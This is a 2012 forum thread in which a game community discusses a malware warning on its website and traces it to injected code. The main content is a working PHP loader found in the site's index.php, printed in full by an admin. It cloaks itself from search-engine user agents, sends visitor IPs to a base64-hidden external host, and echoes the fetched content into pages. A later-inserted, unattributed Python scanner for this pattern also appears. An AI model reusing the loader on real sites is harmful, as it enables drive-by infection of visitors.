Dauss
A HUMAN BRAIN, SAFELY INSULATED FROM THE TERRORS OF HYPERSPACE
Joined: Sun Jan 28, 2007 8:54 pm Posts: 1070 Location: Somewhere beyond the endless sea of hyperspace, fighting for your right to call a planet home.
Re: DataRealms Website Malware Warning
Well, this isn't any good is it.
Mon Jun 11, 2012 4:01 pm

TheLastBanana
DRL Developer
Joined: Wed Dec 13, 2006 5:27 am Posts: 3138 Location: A little south and a lot west of Moscow
Re: DataRealms Website Malware Warning
As you guys can probably imagine, Data is trying to get these problems (as well as some potentially related server issues) dealt with as soon as possible. It's getting a little difficult, though, since he's also trying to work on the next version of CC at the same time. If anybody is willing to give him a hand, or knows anybody who might, send me (or him) a PM.
Wed Jun 13, 2012 2:28 am

NikolaiLev
Joined: Fri Aug 26, 2011 3:06 am Posts: 42
Re: DataRealms Website Malware Warning
Wish I could help, all I can do is point out problems though.
The warning is gone right now, that said.
Wed Jun 13, 2012 2:48 am

NikolaiLev
Joined: Fri Aug 26, 2011 3:06 am Posts: 42
Re: DataRealms Website Malware Warning
Uh oh. The warning is back again.
Thu Jun 21, 2012 10:37 am

findude
Joined: Tue Dec 12, 2006 3:10 pm Posts: 495 Location: Uncertain quantum state
Re: DataRealms Website Malware Warning
http://pastebin.com/Y9rTWnzJ
Oh hi there. This is the presumably foreign piece of script on the site that I managed to catch. It was in a hidden iframe, with a src of "http://ovalslassostyle.net/111", the script src being "/xSE_dFpCn/xjUVworW?cvgqzt=OL.k_kgz8zX5kO". Funny obfuscation. It creates the strings "eval", "substring", "fromCharCode", "indexOf" and "CharAt" with the variables, and calls them as functions. I think the starting ifs break the script after it executes, removing it.
http://pastebin.com/QuWRS4Hd
Here's my best-guess unobfuscation and cleanup. The script then takes a substring and eval's the decrypted code.
http://pastebin.com/MLY8i1kG
I.e. exactly what Daman said.
Sun Jun 24, 2012 1:21 pm

NikolaiLev
Joined: Fri Aug 26, 2011 3:06 am Posts: 42
Re: DataRealms Website Malware Warning
Once again, the warning is gone, for now. Hopefully, for good.
Sun Jun 24, 2012 6:01 pm

scancode
The Licensing Guy
Joined: Sun Aug 24, 2008 2:00 am Posts: 64 Location: Buenos Aires, Argentina.
Re: DataRealms Website Malware Warning
If you ever see something like this again, please give me the URL on the datarealms site where the warning appears, and (if possible) the offending code.
Site seems clean now.
Sun Jun 24, 2012 8:38 pm

findude
Joined: Tue Dec 12, 2006 3:10 pm Posts: 495 Location: Uncertain quantum state
Re: DataRealms Website Malware Warning
As already said, it seems to be happening once per IP or something. The offsite code (called by the obfuscated script) likely hides the script from you once it executes. Or maybe it uses cookies. I caught it with NoScript: it pops a nice big block icon where the invisible iframe resides.
Will check the GET console of Firefox the next time it happens, in hopes of getting a look at the offsite code. I doubt that's how it works, but eh.
Sun Jun 24, 2012 8:45 pm

scancode
The Licensing Guy
Joined: Sun Aug 24, 2008 2:00 am Posts: 64 Location: Buenos Aires, Argentina.
Re: DataRealms Website Malware Warning
Thanks for the info, findude. Seems we had this stuck in index.php
Code:
<?php
if (!isset($sRetry)) {
    global $sRetry;
    $sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
    // Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    // Only visitors whose user agent matches none of these names reach the fetch below
    if ((strstr($sUserAgent, 'google') == false) && (strstr($sUserAgent, 'yahoo') == false)
        && (strstr($sUserAgent, 'baidu') == false) && (strstr($sUserAgent, 'msn') == false)
        && (strstr($sUserAgent, 'opera') == false) && (strstr($sUserAgent, 'chrome') == false)
        && (strstr($sUserAgent, 'bing') == false) && (strstr($sUserAgent, 'safari') == false)
        && (strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if (isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) {
            // Create bot analitics
            $stCurlLink = base64_decode('aHR0cDovL2JvdHVwZGF0ZXN0YXRpc3RpYy5jb20vc3RhdC9zdGF0LnBocA==')
                . '?ip=' . urlencode($_SERVER['REMOTE_ADDR'])
                . '&useragent=' . urlencode($sUserAgent)
                . '&domainname=' . urlencode($_SERVER['HTTP_HOST'])
                . '&fullpath=' . urlencode($_SERVER['REQUEST_URI'])
                . '&check=' . isset($_GET['look']);
            @$stCurlHandle = curl_init($stCurlLink);
        }
    }
    if ($stCurlHandle !== NULL) {
        curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 12);
        $sResult = @curl_exec($stCurlHandle);
        // A response starting with "O" is written straight into the page output
        if ($sResult[0] == "O") {
            $sResult[0] = " ";
            echo $sResult;
            // Statistic code end
        }
        curl_close($stCurlHandle);
    }
}
?>
So it was getting the evil code from an external site. Time to audit security it seems!
Sun Jun 24, 2012 10:11 pm

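A defender-side check for the kind of snippet scancode found, added here as an example and not code from the thread or the DataRealms site: a small Python scanner that flags PHP source combining user-agent gating, a curl_init() fetch, a base64-hidden string and an echo of a variable, and decodes the base64 literals so the callback URL becomes visible. The sample PHP and its placeholder URL are constructed for the demo.

```python
"""Heuristic scanner for the injected-loader pattern shown in the thread."""
import base64
import re

# Constructed sample in the shape of the injected snippet; the callback URL is a
# placeholder, not the real one from the thread.
PLACEHOLDER_URL = "http://example.invalid/stat/stat.php"
SAMPLE_PHP = """<?php
if (!isset($sRetry)) { global $sRetry; $sRetry = 1;
$sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']);
if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'bot') == false)) {
  $stCurlLink = base64_decode('%s').'?ip='.urlencode($_SERVER['REMOTE_ADDR']);
  @$stCurlHandle = curl_init( $stCurlLink ); }
$sResult = @curl_exec($stCurlHandle);
if ($sResult[0]=="O") {$sResult[0]=" "; echo $sResult; }
}
?>""" % base64.b64encode(PLACEHOLDER_URL.encode()).decode()

B64_LITERAL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")

# Each indicator alone is common in legitimate PHP; the combination is what the loader needs.
INDICATORS = {
    "ua_gating": re.compile(r"\$_SERVER\[\s*['\"]HTTP_USER_AGENT['\"]\s*\]"),
    "remote_fetch": re.compile(r"\bcurl_init\s*\("),
    "echoes_variable": re.compile(r"\becho\s+\$\w+\s*;"),
    "hidden_literal": re.compile(r"\bbase64_decode\s*\("),
}


def decoded_literals(php):
    """Decode every base64 string literal passed directly to base64_decode()."""
    out = []
    for m in B64_LITERAL.finditer(php):
        try:
            out.append(base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError; skip non-base64 literals
            pass
    return out


def scan_php(php):
    """Return which indicators fire, any decoded URLs, and an overall verdict."""
    report = {name: bool(rx.search(php)) for name, rx in INDICATORS.items()}
    report["decoded_urls"] = [
        s for s in decoded_literals(php) if s.lower().startswith(("http://", "https://"))
    ]
    # Verdict: all four indicators together, or a base64-hidden URL on its own.
    report["suspicious"] = all(report[k] for k in INDICATORS) or bool(report["decoded_urls"])
    return report


if __name__ == "__main__":
    for key, value in scan_php(SAMPLE_PHP).items():
        print(f"{key}: {value}")
```

Run it over each PHP file under the web root (for example by feeding `open(path).read()` to `scan_php`) and review every hit by hand; the heuristic is meant to surface candidates, not to give a final verdict.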
Glowsticks
Joined: Sat Jul 10, 2010 5:19 pm Posts: 543
Re: DataRealms Website Malware Warning
So, does this mean DRL users are now part of a botnet, or did I read the last two pages incorrectly?
Sun Jun 24, 2012 11:58 pm

TheLastBanana
DRL Developer
Joined: Wed Dec 13, 2006 5:27 am Posts: 3138 Location: A little south and a lot west of Moscow
Re: DataRealms Website Malware Warning
I would strongly suggest that anybody who's visited the site in the last little while run Malwarebytes just to make sure nothing got through. If your security was up to date, chances are you'll be okay.
Mon Jun 25, 2012 5:17 am

NikolaiLev
Joined: Fri Aug 26, 2011 3:06 am Posts: 42
Re: DataRealms Website Malware Warning
I always get this warning at the main site http://www.datarealms.com/ and I generally don't proceed after that. But I'll send the PM if it happens again.
Mon Jun 25, 2012 6:15 pm

scancode
The Licensing Guy
Joined: Sun Aug 24, 2008 2:00 am Posts: 64 Location: Buenos Aires, Argentina.
Re: DataRealms Website Malware Warning
TheLastBanana wrote: I would strongly suggest that anybody who's visited the site in the last little while run Malwarebytes just to make sure nothing got through. If your security was up to date, chances are you'll be okay.
The last little while being from May 20 onwards.
Tue Jun 26, 2012 7:07 pm

NikolaiLev
Joined: Fri Aug 26, 2011 3:06 am Posts: 42
Re: DataRealms Website Malware Warning
I ran an avast scan on June 10 and a MWB scan on June 25. The former resulted in some supposedly infected .dll file in my DesuraApp folder. The latter resulted in two PUM.Hijack.StartMenu items, one being Explorer\Advanced|Start_ShowHelp and Explorer\Advanced|Start_ShowSearch.
I'm running Opera 12.00. I'm also running Windows XP SP3. I guess nothing got in, since I doubt either of those scans had to do with what was on the site.
Tue Jun 26, 2012 8:17 pm

scancode
The Licensing Guy
Joined: Sun Aug 24, 2008 2:00 am Posts: 64 Location: Buenos Aires, Argentina.
Re: DataRealms Website Malware Warning
NikolaiLev wrote: I ran an avast scan on June 10 and a MWB scan on June 25. The former resulted in some supposedly infected .dll file in my DesuraApp folder. The latter resulted in two PUM.Hijack.StartMenu items, one being Explorer\Advanced|Start_ShowHelp and Explorer\Advanced|Start_ShowSearch. I'm running Opera 12.00. I'm also running Windows XP SP3. I guess nothing got in, since I doubt either of those scans had to do with what was on the site.
PUM = Potentially Unwanted Modifications -- Start_ShowHelp hides Start Menu/Help and Start_ShowSearch hides Start Menu/Search. Pretty simple (and benign) stuff.
Tue Jun 26, 2012 10:35 pm